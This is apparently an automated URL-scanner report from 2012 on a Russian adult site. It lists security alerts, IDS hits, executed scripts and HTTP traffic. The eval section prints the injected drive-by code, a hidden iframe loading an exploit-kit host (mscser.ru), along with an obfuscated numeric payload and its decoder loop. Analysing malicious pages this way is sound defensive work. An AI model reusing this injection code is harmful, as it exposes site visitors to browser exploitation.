urlquery.net - Free url scanner

Overview

URL	http://qyqualey.fromru.su/
IP	62.141.94.90
ASN	AS3216 OJSC "Vimpelcom"
Location	Russian Federation
Report completed	2012-11-06 23:36:53 CET
Status	Loading report..
urlQuery Alerts	Detected malicious iframe injection Detected Incognito exploit kit URL pattern

Settings

UserAgent	Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Referer
Adobe Reader	8.0
Java	1.6.0_26

Intrusion Detection Systems

Suricata /w Emerging Threats Pro

No alerts detected

Snort /w Sourcefire VRT

Timestamp	Source IP	Destination IP	Severity	Alert
2012-11-06 23:36:20	213.221.39.9	urlQuery Client	1	BROWSER-IE Microsoft Internet Explorer userdata behavior memory corruption attempt

Recent reports on same IP/ASN/Domain

Last 6 reports on IP: 62.141.94.90

Date	Alerts / IDS	URL	IP
2013-02-14 06:06:15	0 / 1	http://xfotosx01.fromru.su/	62.141.94.90
2013-02-14 05:52:33	0 / 4	http://print.web.fromru.su/	62.141.94.90
2013-02-13 17:25:11	0 / 1	http://16afjnrw0.fromru.su/	62.141.94.90
2013-02-12 20:12:30	0 / 1	http://www.fogoz4maqysi.fromru.su/gerance-commerce-sos-campagne.html	62.141.94.90
2013-02-11 21:20:38	0 / 1	http://nvkamansky.fromru.su/index.html	62.141.94.90
2013-02-11 16:20:31	0 / 1	http://qyqualey.fromru.su/index.html	62.141.94.90

Last 6 reports on ASN: AS3216 OJSC "Vimpelcom"

Date	Alerts / IDS	URL	IP
2013-02-15 03:29:45	0 / 3	http://fatos2010.hotmail.ru/	62.141.94.79
2013-02-14 21:39:15	0 / 1	http://foto.imo.pochta.ru/globs.exe	62.141.94.73
2013-02-14 21:18:12	0 / 1	http://bklyndirt.krovatka.su/	62.141.94.74
2013-02-14 21:05:13	0 / 1	http://mnmm.krovatka.su/	62.141.94.74
2013-02-14 21:05:10	0 / 1	http://msquaredprime.krovatka.su/	62.141.94.74
2013-02-14 21:02:47	0 / 1	http://shuangjiekun.krovatka.su/	62.141.94.74

Last 3 reports on domain: qyqualey.fromru.su

Date	Alerts / IDS	URL	IP
2013-02-11 16:20:31	0 / 1	http://qyqualey.fromru.su/index.html	62.141.94.90
2012-11-07 01:34:43	2 / 1	http://qyqualey.fromru.su/index.html	62.141.94.90
2012-11-06 07:26:02	2 / 1	http://qyqualey.fromru.su/	62.141.94.90

JavaScript

Executed Scripts (24)

Executed Evals (23)

#1 JavaScript::Eval (size: 625, repeated: 2) - Alert detect on script (Severity: 2)

  if (document.getElementsByTagName('body')[0]) {
      iframer();
  } else {
      document.write("<iframe src='http://mscser.ru/in.php?a=QQkFBwQEAAADBgAGEkcJBQcEAQwMBAEABA==' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
  }
  function iframer() {
      var f = document.createElement('iframe');
      f.setAttribute('src', 'http://mscser.ru/in.php?a=QQkFBwQEAAADBgAGEkcJBQcEAQwMBAEABA==');
      f.style.visibility = 'hidden';
      f.style.position = 'absolute';
      f.style.left = '0';
      f.style.top = '0';
      f.setAttribute('width', '10');
      f.setAttribute('height', '10');
      document.getElementsByTagName('body')[0].appendChild(f);
  }

#2 JavaScript::Eval (size: 21, repeated: 1)

MozBorderRadius = "5px"

#3 JavaScript::Eval (size: 37, repeated: 1)

MozBoxShadow = "0 0 5px rgba(0,0,0,.4)"

#4 JavaScript::Eval (size: 2189, repeated: 2)

[136, 136, 16, 12, 156, 192, 108, 60, 116, 28, 52, 36, 212, 200, 44, 160, 36, 200, 40, 56, 36, 52, 36, 212, 200, 4, 124, 100, 112, 76, 160, 132, 76, 52, 36, 192, 128, 196, 60, 108, 100, 128, 120, 84, 68, 144, 120, 176, 136, 136, 136, 16, 12, 148, 76, 52, 36, 148, 192, 120, 168, 136, 136, 180, 156, 36, 56, 4, 36, 156, 176, 136, 136, 136, 108, 60, 116, 28, 52, 36, 212, 200, 44, 204, 148, 16, 200, 36, 192, 64, 0, 16, 12, 148, 76, 52, 36, 156, 4, 148, 116, 104, 128, 48, 200, 200, 164, 188, 92, 92, 52, 4, 116, 4, 36, 148, 44, 148, 28, 92, 16, 212, 44, 164, 48, 164, 172, 76, 104, 32, 32, 140, 216, 124, 204, 32, 40, 184, 184, 184, 96, 124, 160, 184, 24, 40, 140, 116, 80, 124, 32, 116, 40, 184, 32, 204, 8, 124, 184, 40, 184, 124, 184, 104, 104, 128, 156, 204, 16, 108, 200, 48, 104, 128, 152, 68, 128, 156, 48, 36, 16, 160, 48, 200, 104, 128, 152, 68, 128, 156, 4, 200, 100, 56, 36, 104, 128, 208, 16, 4, 16, 196, 16, 56, 16, 200, 100, 188, 48, 16, 108, 108, 36, 212, 168, 164, 60, 4, 16, 200, 16, 60, 212, 188, 76, 196, 4, 60, 56, 28, 200, 36, 168, 56, 36, 12, 200, 188, 68, 168, 200, 60, 164, 188, 68, 168, 128, 88, 0, 92, 16, 12, 148, 76, 52, 36, 88, 64, 120, 168, 136, 136, 180, 136, 136, 12, 28, 212, 116, 200, 16, 60, 212, 156, 16, 12, 148, 76, 52, 36, 148, 192, 120, 176, 136, 136, 136, 208, 76, 148, 156, 12, 156, 104, 156, 108, 60, 116, 28, 52, 36, 212, 200, 44, 116, 148, 36, 76, 200, 36, 40, 56, 36, 52, 36, 212, 200, 192, 128, 16, 12, 148, 76, 52, 36, 128, 120, 168, 12, 44, 4, 36, 200, 184, 200, 200, 148, 16, 196, 28, 200, 36, 192, 128, 4, 148, 116, 128, 20, 128, 48, 200, 200, 164, 188, 92, 92, 52, 4, 116, 4, 36, 148, 44, 148, 28, 92, 16, 212, 44, 164, 48, 164, 172, 76, 104, 32, 32, 140, 216, 124, 204, 32, 40, 184, 184, 184, 96, 124, 160, 184, 24, 40, 140, 116, 80, 124, 32, 116, 40, 184, 32, 204, 8, 124, 184, 40, 184, 124, 184, 104, 104, 128, 120, 168, 12, 44, 4, 200, 100, 56, 36, 44, 208, 16, 4, 16, 196, 16, 56, 16, 200, 100, 104, 128, 48, 16, 108, 108, 36, 212, 128, 168, 12, 44, 4, 200, 100, 56, 36, 44, 164, 60, 4, 16, 200, 16, 60, 212, 104, 128, 76, 196, 4, 60, 56, 28, 200, 36, 128, 168, 12, 44, 4, 200, 100, 56, 36, 44, 56, 36, 12, 200, 104, 128, 68, 128, 168, 12, 44, 4, 200, 100, 56, 36, 44, 200, 60, 164, 104, 128, 68, 128, 168, 12, 44, 4, 36, 200, 184, 200, 200, 148, 16, 196, 28, 200, 36, 192, 128, 204, 16, 108, 200, 48, 128, 20, 128, 152, 68, 128, 120, 168, 12, 44, 4, 36, 200, 184, 200, 200, 148, 16, 196, 28, 200, 36, 192, 128, 48, 36, 16, 160, 48, 200, 128, 20, 128, 152, 68, 128, 120, 168, 136, 136, 136, 108, 60, 116, 28, 52, 36, 212, 200, 44, 160, 36, 200, 40, 56, 36, 52, 36, 212, 200, 4, 124, 100, 112, 76, 160, 132, 76, 52, 36, 192, 128, 196, 60, 108, 100, 128, 120, 84, 68, 144, 44, 76, 164, 164, 36, 212, 108, 72, 48, 16, 56, 108, 192, 12, 120, 168, 136, 136, 180]

#5 JavaScript::Eval (size: 18, repeated: 1)

backgroundColor = ""

#6 JavaScript::Eval (size: 18, repeated: 1)

backgroundImage = ""

#7 JavaScript::Eval (size: 27, repeated: 1)

backgroundRepeat = "repeat-x"

#8 JavaScript::Eval (size: 23, repeated: 1)

border = "4px solid #fff"

#9 JavaScript::Eval (size: 27, repeated: 1)

borderColor = "%borderColor%"

#10 JavaScript::Eval (size: 18, repeated: 1)

borderRadius = "5px"

#11 JavaScript::Eval (size: 27, repeated: 1)

borderStyle = "%borderStyle%"

#12 JavaScript::Eval (size: 29, repeated: 1)

borderWidth = "%borderWidth%px"

#13 JavaScript::Eval (size: 13, repeated: 1)

bottom = "10px"

#14 JavaScript::Eval (size: 34, repeated: 1)

boxShadow = "0 0 5px rgba(0,0,0,.4)"

#15 JavaScript::Eval (size: 12, repeated: 1)

margin = "0px"

#16 JavaScript::Eval (size: 13, repeated: 1)

padding = "0px"

#17 JavaScript::Eval (size: 12, repeated: 1)

right = "10px"

#18 JavaScript::Eval (size: 73, repeated: 1250)

s += ar["su" + ("qwe", "bst") + "ReferenceErr".replace(k, "r")](ar2[i] / (5, 4), 1)

#19 JavaScript::Eval (size: 17, repeated: 1)

textAlign = "right"

#20 JavaScript::Eval (size: 24, repeated: 1)

webkitBorderRadius = "5px"

#21 JavaScript::Eval (size: 40, repeated: 1)

webkitBoxShadow = "0 0 5px rgba(0,0,0,.4)"

#22 JavaScript::Eval (size: 16, repeated: 1)

width = "%bwidth%"

#23 JavaScript::Eval (size: 240, repeated: 1)

window.fl_close_3001 = new Function("var w;try{if(document.all && !window.opera){w=window.frames['ml_c3001'].window;}else if(document.getElementById){w=document.getElementById('ml_c3001').contentWindow;}}catch(e){}if(w) w.fl_close_3001();");

Executed Writes (9)

#1 JavaScript::Write (size: 75, repeated: 1)

<div id="medialand_adland_inline_div_3001" style="display: none">wait</div>

#2 JavaScript::Write (size: 46, repeated: 1)

<div id="mlph3001" style="display:none"></div>

#3 JavaScript::Write (size: 159, repeated: 1)

<div style="visibility:hidden;position:absolute"><iframe id="ml_c3001" width=1 height=1 marginwidth=0 marginheight=0 scrolling=no frameborder=0></iframe></div>

#4 JavaScript::Write (size: 132, repeated: 1)

<img src='http://count.rbc.ru/p103.gif?r=&width=1176&height=885&hash=&rn=0.16650860832632897' border=0 width=1 height=1 alt='count'>

#5 JavaScript::Write (size: 107, repeated: 1)

<script src="http://engine.mediamir.medialand.ru/code?pid=3001&gid=329&oin=0&rid=61826&dreferer="></script>

#6 JavaScript::Write (size: 80, repeated: 1)

<script type="text/javascript" src="http://content.relax.ru/t/base.js"></script>

#7 JavaScript::Write (size: 98, repeated: 1)

<script type="text/javascript" src="http://content.relax.ru/t/inline_pushup.js?20121061"></script>

#8 JavaScript::Write (size: 111, repeated: 1)

<script type="text/javascript" src="http://content.relax.ru/t/inline_pushup_right_bottom.js?20121061"></script>

#9 JavaScript::Write (size: 126, repeated: 1)

<script type="text/javascript" src="http://jsn.dt00.net/p/a/papa.pochta.ru.12654.js?t=11210" charset="windows-1251" ></script>

HTTP Transactions (49)

Request	Response
GET / HTTP/1.1 Host: qyqualey.fromru.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive	HTTP/1.1 200 OK Content-Type: text/html; charset=windows-1251 Server: nginx Date: Tue, 06 Nov 2012 22:36:18 GMT Transfer-Encoding: chunked Connection: keep-alive Content-Encoding: gzip
GET /sbornik-porno-kanalov-smotret-onlayn.jpg HTTP/1.1 Host: qyqualey.fromru.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx Date: Tue, 06 Nov 2012 22:36:18 GMT Content-Length: 4297 Last-Modified: Mon, 29 Nov 2010 06:19:33 GMT Connection: keep-alive Accept-Ranges: bytes
GET /menu.js HTTP/1.1 Host: qyqualey.fromru.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: application/x-javascript; charset=windows-1251 Server: nginx Date: Tue, 06 Nov 2012 22:36:18 GMT Content-Length: 738 Last-Modified: Mon, 29 Nov 2010 06:18:00 GMT Connection: keep-alive Accept-Ranges: bytes
GET /style.css HTTP/1.1 Host: qyqualey.fromru.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/css,/;q=0.1 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: text/css Server: nginx Date: Tue, 06 Nov 2012 22:36:18 GMT Last-Modified: Mon, 29 Nov 2010 06:19:49 GMT Transfer-Encoding: chunked Connection: keep-alive Content-Encoding: gzip
GET /busplatnie-porno-igri.jpg HTTP/1.1 Host: qyqualey.fromru.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx Date: Tue, 06 Nov 2012 22:36:18 GMT Content-Length: 5020 Last-Modified: Mon, 29 Nov 2010 06:17:39 GMT Connection: keep-alive Accept-Ranges: bytes
GET /play.jpg HTTP/1.1 Host: qyqualey.fromru.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx Date: Tue, 06 Nov 2012 22:36:18 GMT Content-Length: 4569 Last-Modified: Mon, 29 Nov 2010 06:18:09 GMT Connection: keep-alive Accept-Ranges: bytes
GET /play_menu.jpg HTTP/1.1 Host: qyqualey.fromru.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx Date: Tue, 06 Nov 2012 22:36:18 GMT Content-Length: 5231 Last-Modified: Mon, 29 Nov 2010 06:18:11 GMT Connection: keep-alive Accept-Ranges: bytes
GET /image2.gif HTTP/1.1 Host: qyqualey.fromru.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: image/gif Server: nginx Date: Tue, 06 Nov 2012 22:36:19 GMT Content-Length: 43 Last-Modified: Mon, 29 Nov 2010 06:17:55 GMT Connection: keep-alive Accept-Ranges: bytes
GET /image1.jpg HTTP/1.1 Host: qyqualey.fromru.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx Date: Tue, 06 Nov 2012 22:36:19 GMT Content-Length: 412 Last-Modified: Mon, 29 Nov 2010 06:17:55 GMT Connection: keep-alive Accept-Ranges: bytes
GET /porno-foto-let.jpg HTTP/1.1 Host: qyqualey.fromru.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx Date: Tue, 06 Nov 2012 22:36:19 GMT Content-Length: 4721 Last-Modified: Mon, 29 Nov 2010 06:18:24 GMT Connection: keep-alive Accept-Ranges: bytes
GET /negrityanka-trahaetsya-onlayn-porno.jpg HTTP/1.1 Host: qyqualey.fromru.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx Date: Tue, 06 Nov 2012 22:36:19 GMT Content-Length: 2965 Last-Modified: Mon, 29 Nov 2010 06:18:02 GMT Connection: keep-alive Accept-Ranges: bytes
GET /onlayn-porno-zrelih-tolstushek-smotret.jpg HTTP/1.1 Host: qyqualey.fromru.su User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: image/jpeg Server: nginx Date: Tue, 06 Nov 2012 22:36:19 GMT Content-Length: 6410 Last-Modified: Mon, 29 Nov 2010 06:18:07 GMT Connection: keep-alive Accept-Ranges: bytes
GET /hit;start-qip-ru?r;s117688524;uhttp%3A//qyqualey.fromru.su/;0.8521948213958476 HTTP/1.1 Host: counter.yadro.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 302 Moved Temporarily Content-Type: text/html Date: Tue, 06 Nov 2012 22:36:19 GMT Server: 0W/0.8c Location: http://counter.yadro.ru/hit;start-qip-ru?q;r;s117688524;uhttp%3A//qyqualey.fromru.su/;0.8521948213958476 Content-Length: 32 Expires: Mon, 07 Nov 2011 20:00:00 GMT Pragma: no-cache Cache-Control: no-cache P3P: policyref="/w3c/p3p.xml", CP="UNI" Set-Cookie: FTID=1GcP3Z3NLwn2; path=/; expires=Wed, 06 Nov 2013 20:00:00 GMT; domain=.yadro.ru
GET /V13a**R%3Erbc_ru/ru/UTF-8/tmsec=pochta_hostings/428444059 HTTP/1.1 Host: www.tns-counter.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 302 Moved Temporarily Content-Type: image/gif Server: tns-counter.0.5.3 Date: Tue, 06 Nov 2012 22:36:19 GMT Content-Length: 43 Location: http://www.tns-counter.ru/V13b**R%3Erbc_ru/ru/UTF-8/tmsec=pochta_hostings/428444059 Connection: close Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CUR OUR NOR" Expires: Thu, 01 Jan 1970 00:00:01 GMT Pragma: no-cache Set-Cookie: guid=45420C03509990E3X1352241379; expires=Thu, 31-Dec-37 23:55:55 GMT; domain=.tns-counter.ru; path=/
GET /hit;pochta-ru?t26.1;r;s117688524;uhttp%3A//qyqualey.fromru.su/;0.8947012742051451 HTTP/1.1 Host: counter.yadro.ru User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 302 Moved Temporarily Content-Type: text/html Date: Tue, 06 Nov 2012 22:36:19 GMT Server: 0W/0.8c Location: http://counter.yadro.ru/hit;pochta-ru?q;t26.1;r;s117688524;uhttp%3A//qyqualey.fromru.su/;0.8947012742051451 Content-Length: 32 Expires: Mon, 07 Nov 2011 20:00:00 GMT Pragma: no-cache Cache-Control: no-cache P3P: policyref="/w3c/p3p.xml", CP="UNI" Set-Cookie: FTID=1GcP3Z3NLwn2; path=/; expires=Wed, 06 Nov 2013 20:00:00 GMT; domain=.yadro.ru
GET /ga.js HTTP/1.1 Host: www.google-analytics.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: / Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/ If-Modified-Since: Wed, 19 Sep 2012 11:51:40 GMT	HTTP/1.1 200 OK Content-Type: text/javascript Content-Length: 14888 Content-Encoding: gzip Last-Modified: Mon, 22 Oct 2012 15:51:19 GMT X-Content-Type-Options: nosniff, nosniff Date: Tue, 06 Nov 2012 13:09:22 GMT Expires: Wed, 07 Nov 2012 01:09:22 GMT Vary: Accept-Encoding Age: 34017 Cache-Control: max-age=43200, public Server: GFE/2.0
GET /p103.gif?r=&width=1176&height=885&hash=&rn=0.16650860832632897 HTTP/1.1 Host: count.rbc.ru GET /p103.gif?r=&width=1176&height=885&hash=&rn=0.16650860832632897 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: image/gif Server: nginx/0.7.61 Date: Tue, 06 Nov 2012 22:36:19 GMT Content-Length: 43 Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT Connection: close Expires: Tue, 06 Nov 2012 22:36:18 GMT Cache-Control: no-cache Set-Cookie: UID=wrokylCZkOMHjxdYPTyGAg==; expires=Wed, 06-Nov-13 22:36:19 GMT; path=/ P3P: policyref="/w3c/p3p.xml", CP="NON CURa ADMa DEVa OUR IND UNI COM NAV LOC"
GET /rb?name=Hosting_240x400&jscookie=0 HTTP/1.1 Host: r.qip.ru GET /rb?name=Hosting_240x400&jscookie=0 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: nginx Date: Tue, 06 Nov 2012 22:36:19 GMT Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=20 Set-Cookie: rb_shows=1230%1ada; expires=Thu, 15 Sep 2022 20:00:00 GMT; path=/; domain=.qip.ru rb_shows_day=1230-1%1ada-1; expires=Wed, 07 Nov 2012 20:00:00 GMT; path=/; domain=.qip.ru Cache-Control: no-cache
GET /iframe?name=Hosting_subfooter&jscookie=0 HTTP/1.1 Host: r.qip.ru GET /iframe?name=Hosting_subfooter&jscookie=0 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: nginx Date: Tue, 06 Nov 2012 22:36:19 GMT Transfer-Encoding: chunked Connection: keep-alive Keep-Alive: timeout=20 Set-Cookie: rb_shows=14f2%14f4; expires=Thu, 15 Sep 2022 20:00:00 GMT; path=/; domain=.qip.ru rb_shows_day=14f2-1%14f4-1; expires=Wed, 07 Nov 2012 20:00:00 GMT; path=/; domain=.qip.ru Cache-Control: no-cache
GET /__utm.gif?utmwv=5.3.7&utms=1&utmn=624677190&utmhn=qyqualey.fromru.su&utmcs=windows-1251&utmsr=1176x885&utmvp=1159x778&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=%D0%9F%D0%BE%D1%80%D0%BD%D1%83%D1%85%D0%B0%20%D0%B2%20%D0%BA%D0%BB%D1%83%D0%B1%D0%B0%D1%85%20%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D0%BE%2C%20%D0%BF%D0%BE%D1%80%D0%BD%D0%BE%20%D1%80%D0%B0%D0%B7%D0%BA%D0%B0%D0%B7%D1%8B%20%D0%BE%D0%BD%D0%BB%D0%B0%D0%B8%D0%BD&utmhid=358252421&utmr=-&utmp=%2F&utmac=UA-34764375-1&utmcc=__utma%3D1.59269207.1352241379.1352241379.1352241379.1%3B%2B__utmz%3D1.1352241379.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmu=qh~ HTTP/1.1 Host: www.google-analytics.com GET /__utm.gif?utmwv=5.3.7&utms=1&utmn=624677190&utmhn=qyqualey.fromru.su&utmcs=windows-1251&utmsr=1176x885&utmvp=1159x778&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=%D0%9F%D0%BE%D1%80%D0%BD%D1%83%D1%85%D0%B0%20%D0%B2%20%D0%BA%D0%BB%D1%83%D0%B1%D0%B0%D1%85%20%D0%B1%D0%B5%D1%81%D0%BF%D0%BB%D0%B0%D1%82%D0%BD%D0%BE%2C%20%D0%BF%D0%BE%D1%80%D0%BD%D0%BE%20%D1%80%D0%B0%D0%B7%D0%BA%D0%B0%D0%B7%D1%8B%20%D0%BE%D0%BD%D0%BB%D0%B0%D0%B8%D0%BD&utmhid=358252421&utmr=-&utmp=%2F&utmac=UA-34764375-1&utmcc=__utma%3D1.59269207.1352241379.1352241379.1352241379.1%3B%2B__utmz%3D1.1352241379.1.1.utmcsr%3D(direct)%7Cutmccn%3D(direct)%7Cutmcmd%3D(none)%3B&utmu=qh~ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13 Accept: image/png,image/;q=0.8,/;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,;q=0.7 Keep-Alive: 115 Connection: keep-alive Referer: http://qyqualey.fromru.su/	HTTP/1.1 200 OK Content-Type: image/gif Date: Thu, 01 Nov 2012 01:09:14 GMT Content-Length: 35 X-Content-Type-Options: nosniff Pragma: no-cache Expires: Wed, 19 Apr 2000 11:43:00 GMT Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate Age: 509225 Server: GFE/2.0
